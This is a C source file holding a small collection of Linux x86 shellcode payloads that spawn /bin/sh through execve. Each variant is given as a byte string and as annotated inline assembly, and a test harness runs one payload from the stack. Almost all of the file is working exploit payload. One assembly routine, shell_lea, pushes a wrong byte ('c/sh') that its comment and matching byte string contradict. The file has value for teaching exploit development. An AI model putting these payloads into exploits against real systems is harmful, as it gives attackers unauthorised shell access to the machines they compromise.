/* * execve("/bin/sh", ...) * * (linux x86 little endian) * * Copyright (c) 2002 Alberto Ornaghi * * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * */ #include /* 43 byte */ char shellcode[] = "\xeb\x1d\x5f\x31\xc0\x88\x47\x07\x89\x7f\x08\x89\x47\x0c\x8d\x57" "\x0c\x8d\x4f\x08\x89\xfb\xb0\x0b\xcd\x80\x40\x31\xdb\xcd\x80\xe8" "\xde\xff\xff\xff/bin/sh"; /* 41 byte */ char shellopt[] = "\xeb\x1b\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x8d\x53" "\x0c\x8d\x4b\x08\xb0\x0b\xcd\x80\x40\x31\xdb\xcd\x80\xe8\xe0\xff" "\xff\xff/bin/sh"; /* 25 byte */ char shellpush[] = "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50" "\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"; /* 24 byte */ char shellpshopt[]= "\x31\xc0\x99\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3" "\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; /* 24 byte by awgn & quequero */ char shelllea[] = "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52" "\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; /* 23 byte by buffer & alor */ char shellpop[] = "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89" "\xe3\x52\x53\x89\xe1\xcd\x80"; /* protos... */ void shell_code(void); void shell_opt(void); void shell_push(void); void shell_push_opt(void); void shell_lea(void); void shell_pop(void); /*******************************************/ int main(int argc, char **argv) { char shell[50]; void (*f)(void) = (void (*)(void))shell; /* copying the shellcode to the stack */ strncpy(shell, shellpop, 50); printf("Shellcode len: %d\n", strlen(shell)); /* * we cant assume anything in the registers * so shellcodes starting with cdq are invalid * because %eax could be negative... */ /* messing the registers a bit */ __asm__(" movl $0xff00ff00, %eax \n" " movl $0xff00ff00, %ebx \n" " movl $0xff00ff00, %ecx \n" " movl $0xff00ff00, %edx \n" " movl $0xff00ff00, %esi \n" " movl $0xff00ff00, %edi \n" " cdq " ); /* * the compile will assemble the following * as call *%eax * since the shellcode is on the stack * %eax will contain 0xbfff.... a negative * value... cqd cant be used... */ f(); return 0; } void shell_code(void) { __asm__( " jmp foo # 0xeb 0x1d \n" " bar: \n" " pop %edi # 0x5f \n" " xorl %eax, %eax # 0x31 0xc0 \n" " movb %al, 0x7(%edi) # 0x88 0x47 0x07 # movb $0x0, 0x7(%edi) \n" " movl %edi, 0x8(%edi) # 0x89 0x7f 0x08 \n" " movl %eax, 0xc(%edi) # 0x89 0x47 0x0c # movl $0x0, 0xc(%edi) \n" " lea 0xc(%edi), %edx # 0x8d 0x57 0x0c \n" " lea 0x8(%edi), %ecx # 0x8d 0x4f 0x08 \n" " mov %edi, %ebx # 0x89 0xfb \n" " movb $0xb, %al # 0xb0 0x0b # mov $0xb, %eax \n" " int $0x80 # 0xcd 0x80 \n" " inc %eax # 0x40 # movl $0x1, %eax \n" " xorl %ebx, %ebx # 0x31 0xdb # movl $0x0, %ebx \n" " int $0x80 # 0xcd 0x80 \n" " foo: \n" " call bar # 0xe8 0xde 0xff 0xff 0xff \n" " .string \"/bin/sh\" \n" ); } void shell_opt(void) { __asm__( " jmp string_addr_o \n" " after_jmp_o: \n" " pop %ebx \n" " xorl %eax, %eax \n" " movb %al, 0x7(%ebx) \n" " movl %ebx, 0x8(%ebx) \n" " movl %eax, 0xc(%ebx) \n" " lea 0xc(%ebx), %edx \n" " lea 0x8(%ebx), %ecx \n" " movb $0xb, %al \n" " int $0x80 \n" " inc %eax \n" " xorl %ebx, %ebx \n" " int $0x80 \n" " string_addr_o: \n" " call after_jmp_o \n" " .string \"/bin/sh\" \n" ); } void shell_push(void) { __asm__( " xor %eax, %eax # 31 c0 \n" " push %eax # 50 # NULL \n" " push $0x68732f6e # 68 6e 2f 73 68 # n/sh \n" " push $0x69622f2f # 68 2f 2f 62 69 # //bi ;) dirty alignment joke ! \n" " movl %esp, %ebx # 89 e3 \n" " push %eax # 50 \n" " movl %esp, %edx # 89 e2 # lea NULL \n" " push %ebx # 53 \n" " movl %esp, %ecx # 89 e1 # lea { \"/bin/sh\", NULL } \n" " movb $0xb, %al # b0 0b \n" " int $0x80 # cd 80 \n" ); } void shell_push_opt(void) { __asm__( " xor %eax, %eax # 31 c0 \n" " cdq # 99 # xor %edx, %edx \n" " push %eax # 50 # NULL \n" " push $0x68732f6e # 68 6e 2f 73 68 # n/sh \n" " push $0x69622f2f # 68 2f 2f 62 69 # //bi ;) dirty alignment joke ! \n" " movl %esp, %ebx # 89 e3 \n" " push %eax # 50 \n" " push %ebx # 53 \n" " movl %esp, %ecx # 89 e1 # lea { \"/bin/sh\", NULL } \n" " movb $0xb, %al # b0 0b \n" " int $0x80 # cd 80 \n" ); } void shell_lea(void) { __asm__( " xor %edx, %edx # 31 d2 \n" " push %edx # 52 \n" " push $0x68732f63 # 68 63 2f 73 68 # n/sh \n" " push $0x69622f2f # 68 2f 2f 62 69 # //bi \n" " mov %esp, %ebx # 89 e3 \n" " push %edx # 52 \n" " push %ebx # 53 \n" " mov %esp, %ecx # 89 e1 \n" " lea 0xb(%edx), %eax # 8d 42 0b # mov 0xb, %eax ;) \n" " int $0x80 # cd 80 \n" ); } void shell_pop(void) { __asm__( " push $0xb # 6a 0b \n" " pop %eax # 58 \n" " cdq # 99 # xor %edx, %edx \n" " push %edx # 52 # NULL \n" " push $0x68732f6e # 68 6e 2f 73 68 # n/sh \n" " push $0x69622f2f # 68 2f 2f 62 69 # //bi \n" " movl %esp, %ebx # 89 e3 \n" " push %edx # 52 \n" " push %ebx # 53 \n" " movl %esp, %ecx # 89 e1 # lea { \"/bin/sh\", NULL } \n" " int $0x80 # cd 80 \n" ); } // vim:ts=4:expandtab